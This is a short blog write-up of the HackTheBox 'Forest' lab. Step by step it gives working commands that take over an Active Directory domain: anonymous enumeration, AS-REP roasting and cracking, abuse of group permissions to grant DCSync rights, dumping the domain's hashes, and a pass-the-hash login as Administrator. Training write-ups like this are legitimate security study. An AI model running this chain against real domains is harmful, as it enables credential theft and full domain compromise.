Forest Writeup | HackTheBox

nmap scan:

53/tcp   open     domain       syn-ack     Simple DNS Plus
88/tcp   open     kerberos-sec syn-ack     Microsoft Windows Kerberos (server time: 2023-06-26 17:44:12Z)
135/tcp  open     msrpc        syn-ack     Microsoft Windows RPC
139/tcp  open     netbios-ssn  syn-ack     Microsoft Windows netbios-ssn
389/tcp  open     ldap         syn-ack     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
425/tcp  filtered icad-el      no-response
445/tcp  open               syn-ack     Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open     kpasswd5?    syn-ack
593/tcp  open     ncacn_http   syn-ack     Microsoft Windows RPC over HTTP 1.0
636/tcp  open     tcpwrapped   syn-ack
3268/tcp open     ldap         syn-ack     Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open     tcpwrapped   syn-ack

Domain: htb.local

Host: FOREST

Enumerating users with enum4linux and ldapsearch

enum4linux -a -u '' -p '' 10.10.10.161

using ldapsearch to enumerate users and groups

ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local"
ldapsearch -x -H ldap://10.10.10.161 -b "dc=htb,dc=local" "objectclass=user" samaccountName | grep sAMAccountName

after getting the users, save the users in a file, after that, i used getNPUsers tool of impacket to get the Kerberos hashes.

impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161 -usersfile users -no-pass

after getting the hash cracked it using john with krb5asrep format.

john --format=krb5asrep alfreso.hashes --wordlist=rockyou.txt

after that connect using evil-winrm, checking for user group found that user is in Service Accounts group, after that runs SharpHound.exe and upload the output to bloodhound.

Checking for shortest path to Domain admins found that Exchange Windows Permissions group “Write Dacl” to Domain Admins.

As, I am in Service account group, i have ability to create new user and add it to groups but not high privilege groups. I added a new user and added it to “Exchange Windows Permissions”, and after the used provided Bloodhound command for Write Dacl misconfiguration to abuse DACL.

#adding new user to domain
C:> net user fuser hacker123 /add /domain
#adding user to Exchange Windows Permissions group
C:> net group "Exchange Windows Permissions" fuser /add /domain
$SecPassword = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\\fuser', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -Principal fuser -Rights DCSync

after that used secretsdump to dump the hashes.

$ impacket-secretsdump htb.local/fuser:[email protected]

after getting the hash, login as Administrator using hash

$ evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

rooted.

Leave a Reply

Your email address will not be published. Required fields are marked *